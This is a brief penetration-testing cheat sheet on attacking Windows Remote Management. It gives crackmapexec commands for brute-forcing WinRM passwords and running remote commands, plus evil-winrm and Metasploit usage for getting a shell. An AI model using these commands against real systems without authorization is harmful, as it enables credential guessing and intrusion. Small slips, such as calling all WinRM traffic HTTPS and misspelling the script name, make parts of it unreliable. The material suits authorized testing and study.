⌘Ctrlk

WinRM

Windows Remote Management
Happens over HTTPS
PORT 5985 and 5986(HTTPS)

Crackmapexec

crackmapexec <protocol> <ip>

Bruteforce WinRM password using wordlist

crackmapexec winrm <ip> -u username -p /wordlist/password

Command execution after bruteforce

crackmapexec winrm <ip> -u <username> -p <password> -x "command"

Evil-winrm.rb

Ruby script for getting a powershell prompt with winrm.

evil-winrm.eb -u <username> -p <password> -i <IP>

Metasploit

exploit/windows/winrm/winrm_script_exec

Last updated 1 year ago